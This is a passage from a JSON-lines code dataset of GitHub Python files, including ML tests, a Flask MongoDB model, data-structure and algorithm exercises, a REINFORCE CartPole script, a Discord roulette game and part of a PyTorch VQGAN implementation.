config[k1].hyperparameters.batch_size = 2.3\n \n with pytest.raises(ValueError, match=r\"invalid batch size\"):\n parse_inputs(config)\n \n config[k1].hyperparameters.batch_size = 32\n config[k1].hyperparameters.epochs = 2.3\n with pytest.raises(ValueError, match=r\"invalid epochs value\"):\n parse_inputs(config)\n \n config[k1].hyperparameters.epochs = 23\n parse_inputs(config)\n break\n","repo_name":"harshnehal1996/ML_OPS","sub_path":"src/tests/test_trainer.py","file_name":"test_trainer.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"1385773389","text":"# flask packages\r\nfrom bson.json_util import json, dumps\r\nfrom bson import ObjectId\r\n# local packages\r\nfrom core.db import mongodb\r\n\r\nclass OrdersModel(): \r\n orders = mongodb['orders']\r\n\r\n def __init__(self, order):\r\n self.id = order['_id']\r\n self.action = order['action']\r\n self.symbol = order['symbol']\r\n self.price = order['price']\r\n self.order_type = order['order_type']\r\n self.order_size = order['order_size']\r\n self.value = order['value']\r\n self.account_id = order['account_id']\r\n\r\n def json(self):\r\n return {'action': self.action, 'symbol': self.symbol, 'price': self.price, 'value': self.value, 'order_type': self.order_type, 'order_size': self.order_size,'account_id': str(self.account_id)}\r\n\r\n @classmethod\r\n def find_by_order_id(cls, id):\r\n order = cls.orders.find_one({'_id' : ObjectId(id)}) \r\n if order:\r\n return OrdersModel(order)\r\n else:\r\n return None\r\n\r\n @classmethod\r\n def find_all_orders_by_account(cls, account_id):\r\n orders = cls.orders.find({'account_id' : ObjectId(account_id)}) \r\n return json.loads(dumps(orders)) if orders else None \r\n\r\n @classmethod\r\n def find_all_orders_by_user(cls, username):\r\n 
orders = cls.orders.find({'username' : username}) \r\n return json.loads(dumps(orders)) if orders else None \r\n\r\n def insert_to_db(self): # inserting data\r\n self.orders.insert({'action': self.action,\r\n 'symbol': self.symbol,\r\n 'price': self.price,\r\n 'order_type': self.order_type,\r\n 'order_size': self.order_size,\r\n 'value': self.value,\r\n 'account_id': ObjectId(self.account_id)})\r\n\r\n def update_to_db(self):\r\n myquery = { \"_id\": self.id }\r\n newvalues = { \"$set\": { \"action\": self.action,\r\n \"price\": self.price,\r\n \"order_type\": self.order_type,\r\n \"order_size\": self.order_size } }\r\n\r\n self.orders.update_one(myquery, newvalues)\r\n\r\n def delete_from_db(self):\r\n self.orders.delete_one({ \"_id\": ObjectId(self.id) })\r\n","repo_name":"ellett-huang/Python-Flask-Restful-API","sub_path":"models/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26497356364","text":"from zad8testy import runtests\nfrom math import ceil, sqrt\nfrom collections import deque\n\n\ndef check_if_is_connected(edges, begging, ending, n):\n G = [[] for _ in range(n)]\n for i in range(begging, ending + 1):\n G[edges[i][0]].append(edges[i][1])\n G[edges[i][1]].append(edges[i][0])\n visited = [False for _ in range(n)]\n q = deque()\n q.append(edges[0][0])\n visited[edges[0][0]] = True\n number_of_visited = 1\n while q:\n u = q.popleft()\n for neighbour in G[u]:\n if not visited[neighbour]:\n number_of_visited += 1\n q.append(neighbour)\n visited[neighbour] = True\n if number_of_visited == n:\n return True\n return False\n\n\ndef binary_search(edges, start, begging, ending, n):\n if begging == ending:\n return begging\n mid = (begging + ending) // 2\n if check_if_is_connected(edges, start, mid, n):\n return binary_search(edges, start, begging, mid, n)\n else:\n return binary_search(edges, start, mid + 1, ending, n)\n\n\ndef highway(A):\n n = len(A)\n distance = [[ceil(sqrt(pow(A[i][0] - A[j][0], 2) + pow(A[i][1] - A[j][1], 2)))\n for i in range(j + 1)] for j in range(n)]\n edges = []\n for i in range(n):\n for j in range(i):\n edges.append((j, i, distance[i][j]))\n edges.sort(key=lambda x: x[2])\n\n minimal = edges[-1][2]\n for i in range(len(edges)):\n if check_if_is_connected(edges, i, len(edges) - 1, n):\n optimal = binary_search(edges, i, i, len(edges) - 1, n)\n if edges[optimal][2] - edges[i][2] < minimal:\n if check_if_is_connected(edges, i, optimal, n):\n minimal = edges[optimal][2] - edges[i][2]\n\n return minimal\n\n\nruntests(highway, all_tests=True)\n","repo_name":"WojciechBarczynski/Algorithms_and_Data_Structures","sub_path":"offline_tasks/offline8/zad8.py","file_name":"zad8.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40555506184","text":"class DoubleListNode:\n \"\"\"\n Double_LinkedList: In a doubly linked list, each node has a\n data element, a reference to the next node, and a reference\n to the previous node. 
This allows for traversal in both\n directions.\n \"\"\"\n\n def __init__(self, val: any, next=None, prev=None):\n self.prev = prev\n self.val = val\n self.next = next\n\n def list_append(lst: list[any]) -> [\"DoubleListNode\", \"DoubleListNode\"]:\n \"\"\"\n queue type insertion where data are added in bottom,\n insertion order is kept:\n insert(1)\n insert(2)\n insert(3)\n head->1<->2<->3<-tail\n\n returns list: [head, tail]\n \"\"\"\n head, tail = None, None\n for val in lst:\n temp = DoubleListNode(val, next=None, prev=None)\n if head == None and tail == None:\n head = temp\n tail = temp\n else:\n tail.next = temp\n temp.prev = tail\n tail = temp\n return [head, tail]\n\n def list_stack(lst: list(any)) -> list[\"DoubleListNode\", \"DoubleListNode\"]:\n \"\"\"\n stack type insertion where new data gets added to top,\n insertion order are reversed:\n insert(1)\n insert(2)\n insert(3)\n tail->1<->2<->3<-head\n\n returns list: [head, tail]\n \"\"\"\n head, tail = DoubleListNode.list_append(lst)\n return [tail, head]\n\n def list_print_head(head: \"DoubleListNode\"):\n temp = head\n while temp != None:\n if temp.next != None:\n print(temp.val, end=\"->\")\n else:\n print(temp.val)\n temp = temp.next\n print(\"\")\n\n def list_print_tail(tail: \"DoubleListNode\"):\n temp = tail\n while temp != None:\n if temp.prev != None:\n print(temp.val, end=\"<-\")\n else:\n print(temp.val)\n temp = temp.prev\n print(\"\")\n","repo_name":"Gunjan7991/coding_problem_solving","sub_path":"python_solver/dataStructure/dll.py","file_name":"dll.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"32278712554","text":"import sys\nimport torch\nimport gym\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\n\nGAMMA = 0.9 # We care about long term rewards\nALPHA = 0.1\nEPSILON = 0.1\nMAX_NUM_EPISODES = 1000\nMAX_STEPS = 10000\nSHOULD_RENDER = False\n\n\"\"\"\nSummary of required packages: \npython3 -m pip install torch, gym, numpy, matplotlib\n\nReferences\nYoon blog: https://medium.com/@thechrisyoon/deriving-policy-gradients-and-implementing-reinforce-f887949bd63\nPyTorch examples: https://github.com/pytorch/examples/blob/master/reinforcement_learning/reinforce.py\n\"\"\"\n\n#\n# Neural Network Setup\n# The architecture of this network is the following:\n# a 1 layer network (remember that we don't include the output layer in the count)\n# Data enters a fully connected input layer passes through relu activation. 
A second fully\n# connected layer takes its outputs and passes through softmax activation to yield probabilities\n# for multiple actions.\n# We use Adam (or Adaptive Moments Estimation) optimization because it is memory efficient and requires\n# little tuning.\nclass PolicyNetwork(nn.Module):\n # All of the components of our network are here\n def __init__(self, num_inputs, num_actions, hidden_size, learning_rate=3e-4):\n super(PolicyNetwork, self).__init__()\n\n self.num_actions = num_actions\n self.linear1 = nn.Linear(num_inputs, hidden_size)\n self.linear2 = nn.Linear(hidden_size, num_actions)\n self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)\n\n # The structure of the network is here\n def forward(self, state):\n x = F.relu(self.linear1(state))\n # We use softmax at the last layer in order to output probabilities (regress)\n actionProbs = F.softmax(self.linear2(x), dim=1)\n return actionProbs\n\n def get_action(self, state):\n state = torch.from_numpy(state).float().unsqueeze(0)\n probs = self.forward(Variable(state))\n highest_prob_action = np.random.choice(self.num_actions, p=np.squeeze(probs.detach().numpy()))\n log_prob = torch.log(probs.squeeze(0)[highest_prob_action])\n return highest_prob_action, log_prob\n\n#\n# Network training\n#\ndef update_policy(policy_network, rewards, log_probs):\n discounted_rewards = []\n\n # Compute discounted future rewards for all time steps\n for t in range(len(rewards)):\n Gt = 0\n pw = 0\n for r in rewards[t:]:\n Gt = Gt + GAMMA ** pw * r\n pw = pw + 1\n discounted_rewards.append(Gt)\n\n # Normalize discounted rewards: center and confine to some range, in this case the mean\n # Q: why use std instead of max or some other finite measure? Rewards outside of std will\n # have value 1+ or 1-\n # A: The main purpose of doing this normalization is to avoid unstable/noisy gradients. 
The\n # subtraction of the mean is the primary action that mitigates high variance in grads.\n discounted_rewards = torch.tensor(discounted_rewards)\n discounted_rewards = (discounted_rewards - discounted_rewards.mean()) / (\n discounted_rewards.std() + 1e-9)\n\n policy_gradient = []\n for log_prob, Gt in zip(log_probs, discounted_rewards):\n policy_gradient.append(-log_prob * Gt)\n\n policy_network.optimizer.zero_grad()\n policy_gradient = torch.stack(policy_gradient).sum()\n policy_gradient.backward()\n policy_network.optimizer.step()\n\n\ndef main():\n env = gym.make('CartPole-v0')\n policy_net = PolicyNetwork(env.observation_space.shape[0], env.action_space.n, 128)\n\n numsteps = []\n avg_numsteps = []\n all_rewards = []\n\n for episode in range(MAX_NUM_EPISODES):\n state = env.reset()\n log_probs = []\n rewards = []\n\n for steps in range(MAX_STEPS):\n if SHOULD_RENDER:\n env.render()\n\n action, log_prob = policy_net.get_action(state)\n new_state, reward, done, _ = env.step(action)\n log_probs.append(log_prob)\n rewards.append(reward)\n\n if done:\n update_policy(policy_net, rewards, log_probs)\n numsteps.append(steps)\n avg_numsteps.append(np.mean(numsteps[-10:]))\n all_rewards.append(np.sum(rewards))\n if episode % 1 == 0:\n totalReward = np.round(np.sum(rewards), decimals=3)\n meanReward = np.round(np.mean(all_rewards[-10:]), decimals=3)\n info = f\"episode: {episode}, total reward: {totalReward},\"\n info += f\"average_reward: {meanReward}, length: {steps}\\n\"\n sys.stdout.write(info)\n break\n\n state = new_state\n\n plt.plot(numsteps)\n plt.plot(avg_numsteps)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Time steps\")\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"bilkitty/LearningOnTheSide","sub_path":"algo/policygradients/reinforce.py","file_name":"reinforce.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26150768778","text":"import itertools\r\nimport logging\r\nimport random\r\nfrom typing import TYPE_CHECKING\r\n\r\nfrom discord import Enum, Guild, Member, User\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Context\r\n\r\nfrom ..util import TTLCache\r\n\r\nfrom . import register_handlers\r\nfrom ..bot import Tabby, TabbyCog\r\n\r\n\r\nif TYPE_CHECKING:\r\n from discord.abc import MessageableChannel\r\n\r\n\r\nLOGGER = logging.getLogger(__name__)\r\n\r\n\r\nclass Silly(TabbyCog):\r\n _ongoing: TTLCache[\"Guild | MessageableChannel\", \"Roulette\"]\r\n\r\n def __init__(self, bot: Tabby) -> None:\r\n super().__init__(bot)\r\n self._ongoing = TTLCache(expiry=60 ** 2)\r\n\r\n def _roulette_for(self, ctx: Context) -> \"Roulette\":\r\n key = ctx.guild or ctx.channel\r\n\r\n return self._ongoing.setdefault(key, Roulette(6))\r\n\r\n @commands.group(invoke_without_command=True)\r\n async def roulette(self, ctx: Context):\r\n \"\"\"Play a game of Russian Roulette in the current server\r\n\r\n This command simulates a revolving cylinder, so your odds get worse the longer you go on. Once the cylinder is\r\n empty, you can reload it with the \"reload\" subcommand, or swap to a cylinder of a different size using the\r\n \"swap\" subcommand.\r\n\r\n The state of the cylinder is shared between the entire server, so you can duel with your friends, if you're\r\n feeling suitably impulsive. 
Try not to lose your head!\r\n \"\"\"\r\n\r\n revolver = self._roulette_for(ctx)\r\n result = revolver.fire()\r\n\r\n if result is Chamber.empty:\r\n plural = \"s\" * (revolver.remaining != 1)\r\n return await ctx.send(f\"*Click*. {revolver.remaining} chamber{plural} left.\")\r\n\r\n await ctx.send(\"**Bang**! The cylinder is now empty.\")\r\n\r\n @roulette.command()\r\n async def reload(self, ctx: Context):\r\n \"\"\"Reload the cylinder, and play again.\"\"\"\r\n\r\n revolver = self._roulette_for(ctx)\r\n revolver.reload()\r\n\r\n await ctx.send(f\"Reloaded the cylinder. {revolver.capacity} chambers left.\")\r\n\r\n @roulette.command()\r\n async def swap(self, ctx: Context, chambers: int):\r\n \"\"\"Swap to a cylinder of a different size, and play again.\"\"\"\r\n\r\n key = ctx.guild or ctx.channel\r\n self._ongoing[key] = Roulette(chambers)\r\n\r\n await ctx.send(f\"Swapped to a cylinder with {chambers} chambers.\")\r\n\r\n\r\nclass Chamber(Enum):\r\n empty = False\r\n bullet = True\r\n\r\n\r\nclass Roulette:\r\n _chambers: list[Chamber]\r\n _capacity: int\r\n\r\n def __init__(self, capacity: int) -> None:\r\n if capacity <= 1:\r\n plural = \"s\" * (capacity != 1)\r\n\r\n raise RouletteError(f\"Nobody sane has manufactured a revolver with {capacity} chamber{plural}.\")\r\n\r\n self._capacity = capacity\r\n self.reload()\r\n\r\n @property\r\n def capacity(self) -> int:\r\n return self._capacity\r\n\r\n @property\r\n def remaining(self) -> int:\r\n return len(self._chambers)\r\n\r\n def reload(self) -> None:\r\n self._chambers = [Chamber.bullet, *itertools.repeat(Chamber.empty, self._capacity - 1)]\r\n random.shuffle(self._chambers)\r\n\r\n def fire(self) -> Chamber:\r\n if not self._chambers:\r\n raise RouletteError(\"The cylinder is empty.\")\r\n\r\n result = self._chambers.pop()\r\n\r\n if result is Chamber.bullet:\r\n self._chambers = []\r\n\r\n return result\r\n\r\n\r\nclass RouletteError(Exception):\r\n pass\r\n\r\n\r\nregister_handlers()\r\n","repo_name":"kaylynn234/tabby","sub_path":"tabby/ext/silly.py","file_name":"silly.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26347085009","text":"\"\"\"\nMQuad filtering without the need for an elbow heuristics.\n\"\"\"\n\n# Code\nimport os\nimport warnings\nfrom sklearn.metrics import normalized_mutual_info_score\nimport matplotlib\nfrom matplotlib.colors import ListedColormap\nwarnings.filterwarnings('ignore')\n\nfrom mito_utils.preprocessing import *\nfrom mito_utils.utils import *\nfrom mito_utils.preprocessing import *\nfrom mito_utils.dimred import *\nfrom mito_utils.distances import *\nfrom mito_utils.clustering import *\nfrom mito_utils.it_diagnostics import *\nfrom mito_utils.it_iterations import *\nfrom mito_utils.plotting_base import *\nfrom mito_utils.embeddings_plots import *\nfrom mito_utils.heatmaps_plots import plot_heatmap\nmatplotlib.use('macOSX')\n\n\n# Args\npath_main = '/Users/IEO5505/Desktop/mito_bench'\nsample = 'MDA_PT'\n\n# Paths\npath_data = os.path.join(path_main, 'data') \npath_output = os.path.join(path_main, 'results', 'unsupervised_clones', 'output')\npath_viz = os.path.join(path_main, 'results', 'unsupervised_clones', 'visualization')\npath_tmp = os.path.join(path_main, 'results', 'unsupervised_clones', 'downstream_files')\n\n\n##\n\n# Load\nafm = read_one_sample(path_data, sample, with_GBC=True)\na_cells = filter_cells_coverage(afm)\na_cells = filter_baseline(a_cells)\n\nt = .75\ngt_l = [\n 
rank_clone_variants(\n a_cells, var='GBC', group=g, rank_by='custom_perc_tresholds',\n min_clone_perc=t, max_perc_rest=.25\n ).assign(clone=g)\n for g in a_cells.obs['GBC'].unique()\n]\ndf_gt = pd.concat(gt_l).join(summary_stats_vars(a_cells))\n\n# Filter \nvois_df = (\n df_gt\n .query('n_cells_clone>10')\n .sort_values('log2_perc_ratio', ascending=False)\n .loc[:, \n [\n 'median_AF_clone', 'median_AF_rest', 'perc_clone', \n 'perc_rest', 'log2_perc_ratio', 'n_cells_clone', 'clone'\n ]\n ]\n)\nvois = vois_df.index.unique()\ncells = a_cells.obs['GBC'].loc[lambda x: x.isin(vois_df['clone'])].index\n\n\n# UMAP and visualization\na_good = filter_cells_and_vars(a_cells, cells=cells, variants=vois)[0]\na_good = nans_as_zeros(a_good)\nX_umap = reduce_dimensions(a_good, 'UMAP', metric='cosine', n_comps=2)\n\ndf_ = (\n pd.DataFrame(X_umap[0], columns=X_umap[1], index=cells)\n .join(a_cells.obs)\n)\ndf_['GBC'] = df_['GBC'].astype('str')\n\nfig, ax = plt.subplots(figsize=(4.8,5))\ndraw_embeddings(\n df_, cat='GBC', ax=ax, \n axes_kwargs={'legend':False},\n title=f'MDA_PT, only recoverable cells and GT variants ({100 * cells.size / a_cells.shape[0]:.2f}%)',\n legend_kwargs={'loc':'center left', 'bbox_to_anchor':(1,.5)}\n)\nfig.tight_layout()\nplt.show()\n\n\n##\n\n\n# UMAP and visualization\na_miller = filter_cells_and_vars(a_cells, filtering='miller2022')[0]\na_miller = nans_as_zeros(a_miller)\nX_umap = reduce_dimensions(a_miller, 'UMAP', metric='cosine', n_comps=2)\n\ndf_ = (\n pd.DataFrame(X_umap[0], columns=X_umap[1], index=a_miller.obs_names)\n .join(a_cells.obs)\n)\ndf_['GBC'] = df_['GBC'].astype('str')\n\nfig, ax = plt.subplots(figsize=(4.8,5))\ndraw_embeddings(\n df_, cat='GBC', ax=ax, \n axes_kwargs={'legend':False},\n title=f'MDA_PT, all cells, miller2022 variants',\n legend_kwargs={'loc':'center left', 'bbox_to_anchor':(1,.5)}\n)\nfig.tight_layout()\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport cassiopeia as cs\n\n\nM = pd.DataFrame(\n np.where(a_good.X>.1, 1, 0),\n index=a_good.obs_names,\n columns=a_good.var_names\n)\n\nD = pd.DataFrame(\n pair_d(a_good, metric='cosine'),\n index=a_good.obs_names,\n columns=a_good.obs_names\n)\n\ntree = cs.data.CassiopeiaTree(\n character_matrix=M, \n dissimilarity_map=D, \n cell_meta=a_good.obs\n)\nsolver = cs.solver.UPGMASolver()\n# solver = cs.solver.NeighborJoiningSolver(add_root=True)\n# solver = cs.solver.ILPSolver()\n# solver = cs.solver.VanillaGreedySolver()\nsolver.solve(tree)\n\n\n\ndir(tree)\ntree\n\ntree.cell_meta = pd.DataFrame(\n a_cells.obs.loc[tree.leaves, \"GBC\"].astype(str)\n)\nto_plot = vois_df.sort_values('n_cells_clone', ascending=False).index[:6]\ntree.cell_meta[to_plot] = a_good[tree.leaves, to_plot].X.toarray()\n\nfig, ax = plt.subplots(figsize=(8,8))\ncs.pl.plot_matplotlib(\n tree, meta_data=[to_plot[0], \"GBC\"], \n categorical_cmap=ListedColormap(sc.pl.palettes.godsnot_102), \n continuous_cmap='mako',\n add_root=True,\n ax=ax\n)\nformat_ax(ax, title=f'Jaccard distance, ILP')\n# format_ax(ax, title=f'MDA_PT, all cells, miller2022 variants')\nplt.show()\n\n\nlen(tree.leaves) / a_cells.shape[0]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfrom Bio.Phylo.Consensus import bootstrap\n\n\n\n\n\n\n\n\n\nprobability_threshold = 0.05\n\ncs.tl.compute_expansion_pvalues(tree, min_clade_size=(0.05 * tree.n_cell), min_depth=6)\nexpanding_nodes = []\nfor node in tree.depth_first_traverse_nodes():\n if tree.get_attribute(node, \"expansion_pvalue\") < probability_threshold:\n 
expanding_nodes.append(node)\n\n\nmake_folder(path_viz, 'trees', overwrite=True)\n\nfor i in range(len(expanding_nodes)):\n fig, ax = plt.subplots(figsize=(9,9))\n cs.pl.plot_matplotlib(\n tree, meta_data=[\"GBC\"], \n categorical_cmap=ListedColormap(sc.pl.palettes.godsnot_102), \n clade_colors={expanding_nodes[i]: \"red\"},\n add_root=True,\n ax=ax\n )\n fig.tight_layout()\n fig.savefig(os.path.join(path_viz, 'trees', f'clone_{i}.png'))\n\n\n\n\n# Association\n\n\ncs.tl.compute_morans_i(tree, meta_columns=[to_plot[1]])\n\n\n\nfrom scipy.stats import f_oneway\n\n\n# Perform the phylogenetic ANOVA (one-way ANOVA)\nanova_result = f_oneway(*tree.cell_meta['GBC'].astype('category').cat.codes)\n\n# Print the F-statistic and p-value\nprint(\"F-statistic:\", anova_result.statistic)\nprint(\"p-value:\", anova_result.pvalue)\n\n\n\n\n","repo_name":"andrecossa5/mito_unsupervised","sub_path":"iterative_scheme/MQuad_no_elbow.py","file_name":"MQuad_no_elbow.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34063557208","text":"from model.group import Group\nimport pytest\nfrom data.groups import testdata\n\ndef test_add_group(app, json_groups):\n group = json_groups\n old_groups = app.group.get_group_list()\n app.group.create(group)\n assert app.group.count() - len(old_groups) == 1\n new_groups = app.group.get_group_list()\n old_groups.append(group)\n assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)\n\n","repo_name":"tiptop32/python_for_testers","sub_path":"test/test_add_group.py","file_name":"test_add_group.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7085668256","text":"def main(n, k):\n MAX = 1200\n\n is_prime = [True] * (MAX + 10)\n primes = set()\n primes_list = []\n\n def sieve():\n nonlocal is_prime, primes, MAX, primes_list\n for i in range(2, MAX // 2):\n is_prime[2 * i] = False\n for i in range(3, MAX):\n if is_prime[i]:\n primes.add(i)\n for j in range(i * i, MAX, i):\n if j > MAX:\n break\n is_prime[j] = False\n\n def f(u):\n nonlocal primes, is_prime, primes_list\n for i in range(len(primes_list) - 1):\n if primes_list[i] + primes_list[i + 1] + 1 == u:\n return True\n if primes_list[i] + primes_list[i + 1] + 1 > u:\n return False\n return False\n sieve()\n primes_list = sorted(list(primes))\n x = 0\n for i in range(2, n + 1):\n if i in primes:\n if f(i):\n x += 1\n if x >= k:\n return \"YES\"\n return \"NO\"\n\n(n, k) = map(int, input().split(' '))\nprint(main(n, k))\n","repo_name":"austinschwartz/Competitive-Programming","sub_path":"codeforces/0017A_-_Noldbach_problem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"11419511031","text":"import math\nfrom math import sqrt\nfrom functools import partial\nimport torch\nfrom torch.autograd import grad as torch_grad\nfrom torch import nn, einsum\nfrom torch.autograd import grad\nfrom torch.optim import Adam\nimport torch.nn.functional as F\nimport torchvision\n\nfrom einops import rearrange, reduce, repeat\nfrom einops.layers.torch import Rearrange, Reduce\n\nfrom vector_quantize_pytorch import VectorQuantize as VQ\n\nfrom nuwa_pytorch.reversible import ReversibleSequence\nfrom nuwa_pytorch.reversible_video_audio import DualModalityReversibleSequence\n\nfrom 
unfoldNd import unfoldNd\n\n# constants\n\nMList = nn.ModuleList\n\n# helper functions\n\ndef exists(val):\n return val is not None\n\ndef default(val, d):\n return val if exists(val) else d\n\ndef cast_tuple(val, size = 1):\n return val if isinstance(val, tuple) else (val,) * size\n\ndef calc_same_padding(kernel_size, dilation = 1):\n return dilation * (kernel_size - 1) // 2\n\n# keyword argument helpers\n\ndef pick_and_pop(keys, d):\n values = list(map(lambda key: d.pop(key), keys))\n return dict(zip(keys, values))\n\ndef group_dict_by_key(cond, d):\n return_val = [dict(),dict()]\n for key in d.keys():\n match = bool(cond(key))\n ind = int(not match)\n return_val[ind][key] = d[key]\n return (*return_val,)\n\ndef string_begins_with(prefix, str):\n return str.startswith(prefix)\n\ndef group_by_key_prefix(prefix, d):\n return group_dict_by_key(partial(string_begins_with, prefix), d)\n\ndef groupby_prefix_and_trim(prefix, d):\n kwargs_with_prefix, kwargs = group_dict_by_key(partial(string_begins_with, prefix), d)\n kwargs_without_prefix = dict(map(lambda x: (x[0][len(prefix):], x[1]), tuple(kwargs_with_prefix.items())))\n return kwargs_without_prefix, kwargs\n\n# decorators\n\ndef eval_decorator(fn):\n def inner(model, *args, **kwargs):\n was_training = model.training\n model.eval()\n out = fn(model, *args, **kwargs)\n model.train(was_training)\n return out\n return inner\n\n# tensor helper functions\n\ndef log(t, eps = 1e-20):\n return torch.log(t.clamp(min = eps))\n\ndef sigmoid(t):\n return torch.where(t >= 0, 1 / (1 + torch.exp(-t)), t.exp() / (1 + t.exp()))\n\ndef gumbel_noise(t):\n noise = torch.zeros_like(t).uniform_(0, 1)\n return -log(-log(noise))\n\ndef gumbel_sample(t, temperature = 1., dim = -1):\n return ((t / temperature) + gumbel_noise(t)).argmax(dim = dim)\n\ndef safe_div(numer, denom, eps = 1e-6):\n return numer / (denom + eps)\n\ndef stable_softmax(t, dim = -1, alpha = 32 ** 2):\n t = t / alpha\n t = t - torch.amax(t, dim = dim, keepdim = True).detach()\n return (t * alpha).softmax(dim = dim)\n\ndef prob_mask_like(shape, prob, device):\n return torch.zeros(shape, device = device).float().uniform_(0, 1) < prob\n\ndef l2norm(t):\n return F.normalize(t, dim = -1)\n\ndef leaky_relu(p = 0.1):\n return nn.LeakyReLU(0.1)\n\n# gan losses\n\ndef hinge_discr_loss(fake, real):\n return (F.relu(1 + fake) + F.relu(1 - real)).mean()\n\ndef hinge_gen_loss(fake):\n return -fake.mean()\n\ndef bce_discr_loss(fake, real):\n return (-log(1 - sigmoid(fake)) - log(sigmoid(real))).mean()\n\ndef bce_gen_loss(fake):\n return -log(sigmoid(fake)).mean()\n\ndef grad_layer_wrt_loss(loss, layer):\n return grad(\n outputs = loss,\n inputs = layer,\n grad_outputs = torch.ones_like(loss),\n retain_graph = True\n )[0].detach()\n\ndef batch_process(t, fn, chunks = 10, dim = 0):\n chunks = [fn(t_chunk) for t_chunk in t.chunk(chunks, dim = dim)]\n return torch.cat(chunks, dim = dim)\n\ndef gradient_penalty(images, output, weight = 10):\n batch_size = images.shape[0]\n gradients = torch_grad(outputs = output, inputs = images,\n grad_outputs = torch.ones(output.size(), device = images.device),\n create_graph = True, retain_graph = True, only_inputs = True)[0]\n\n gradients = rearrange(gradients, 'b ... 
-> b (...)')\n return weight * ((gradients.norm(2, dim=1) - 1) ** 2).mean()\n\n# gradient control\n\ndef frac_gradient(t, frac):\n return t * frac + t.detach() * (1 - frac)\n\n# vqgan vae\n\nclass LayerNormChan(nn.Module):\n def __init__(\n self,\n dim,\n eps = 1e-5\n ):\n super().__init__()\n self.eps = eps\n self.g = nn.Parameter(torch.ones(1, dim, 1, 1))\n self.b = nn.Parameter(torch.zeros(1, dim, 1, 1))\n\n def forward(self, x):\n var = torch.var(x, dim = 1, unbiased = False, keepdim = True)\n mean = torch.mean(x, dim = 1, keepdim = True)\n return (x - mean) / (var + self.eps).sqrt() * self.g + self.b\n\nclass Discriminator(nn.Module):\n def __init__(\n self,\n dims,\n channels = 3,\n groups = 16,\n init_kernel_size = 5\n ):\n super().__init__()\n dim_pairs = zip(dims[:-1], dims[1:])\n\n self.layers = MList([nn.Sequential(nn.Conv2d(channels, dims[0], init_kernel_size, padding = init_kernel_size // 2), leaky_relu())])\n\n for dim_in, dim_out in dim_pairs:\n self.layers.append(nn.Sequential(\n nn.Conv2d(dim_in, dim_out, 4, stride = 2, padding = 1),\n nn.GroupNorm(groups, dim_out),\n leaky_relu()\n ))\n\n dim = dims[-1]\n self.to_logits = nn.Sequential( # return 5 x 5, for PatchGAN-esque training\n nn.Conv2d(dim, dim, 1),\n leaky_relu(),\n nn.Conv2d(dim, 1, 4)\n )\n\n def forward(self, x):\n for net in self.layers:\n x = net(x)\n\n return self.to_logits(x)\n\nclass ContinuousPositionBias(nn.Module):\n \"\"\" from https://arxiv.org/abs/2111.09883 \"\"\"\n\n def __init__(self, *, dim, heads, layers = 2):\n super().__init__()\n self.net = MList([])\n self.net.append(nn.Sequential(nn.Linear(2, dim), leaky_relu()))\n\n for _ in range(layers - 1):\n self.net.append(nn.Sequential(nn.Linear(dim, dim), leaky_relu()))\n\n self.net.append(nn.Linear(dim, heads))\n self.register_buffer('rel_pos', None, persistent = False)\n\n def forward(self, x):\n n, device = x.shape[-1], x.device\n fmap_size = int(sqrt(n))\n\n if not exists(self.rel_pos):\n pos = torch.arange(fmap_size, device = device)\n grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij'))\n grid = rearrange(grid, 'c i j -> (i j) c')\n rel_pos = rearrange(grid, 'i c -> i 1 c') - rearrange(grid, 'j c -> 1 j c')\n rel_pos = torch.sign(rel_pos) * torch.log(rel_pos.abs() + 1)\n self.register_buffer('rel_pos', rel_pos, persistent = False)\n\n rel_pos = self.rel_pos.float()\n\n for layer in self.net:\n rel_pos = layer(rel_pos)\n\n bias = rearrange(rel_pos, 'i j h -> h i j')\n return x + bias\n\nclass GLUResBlock(nn.Module):\n def __init__(self, chan, groups = 16):\n super().__init__()\n self.net = nn.Sequential(\n nn.Conv2d(chan, chan * 2, 3, padding = 1),\n nn.GLU(dim = 1),\n nn.GroupNorm(groups, chan),\n nn.Conv2d(chan, chan * 2, 3, padding = 1),\n nn.GLU(dim = 1),\n nn.GroupNorm(groups, chan),\n nn.Conv2d(chan, chan, 1)\n )\n\n def forward(self, x):\n return self.net(x) + x\n\nclass ResBlock(nn.Module):\n def __init__(self, chan, groups = 16):\n super().__init__()\n self.net = nn.Sequential(\n nn.Conv2d(chan, chan, 3, padding = 1),\n nn.GroupNorm(groups, chan),\n leaky_relu(),\n nn.Conv2d(chan, chan, 3, padding = 1),\n nn.GroupNorm(groups, chan),\n 